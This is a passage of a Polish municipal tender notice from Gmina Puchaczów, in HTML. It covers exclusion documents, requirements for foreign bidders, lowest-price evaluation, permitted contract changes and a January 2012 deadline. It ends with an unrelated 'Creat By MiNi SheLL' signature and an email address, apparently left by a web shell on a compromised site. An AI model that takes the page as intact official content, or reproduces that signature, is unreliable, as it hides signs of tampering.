<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy na poniższych warunkach:
a)	w przypadku ponadprzeciętnego czasu trwania procedur administracyjnych, mającego wpływ na termin wykonania, co nie wynika z winy Wykonawcy,
b)	w przypadku zmiany stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego,
c)	w przypadku szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych, niezbędnych do należytego wykonania umowy,
d)	w przypadku wystąpienia siły wyższej (tj. działania i zamieszki wojenne, ataki terrorystyczne klęski żywiołowe spowodowane przez burze, huragany) uniemożliwiającej wykonanie zamówienia w terminie umownym,
e)	w przypadku zmiany przepisów prawa mających bezpośredni i istotny wpływ na wykonanie przedmiotu Umowy lub jego poszczególnych etapów,
f)	w przypadku złożenia przez Wykonawcę propozycji, które przyśpieszą ukończenie przedmiotu umowy, zmniejszając koszty lub w inny sposób dostarczą zamawiającemu pożytku,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puchaczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Puchaczów ul. Lubelska 22, 21-013 Puchaczów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2012 godzina 10:00, miejsce: Urząd Gminy Puchaczów ul. Lubelska 22, 21-013 Puchaczów  sekretariat pok. nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com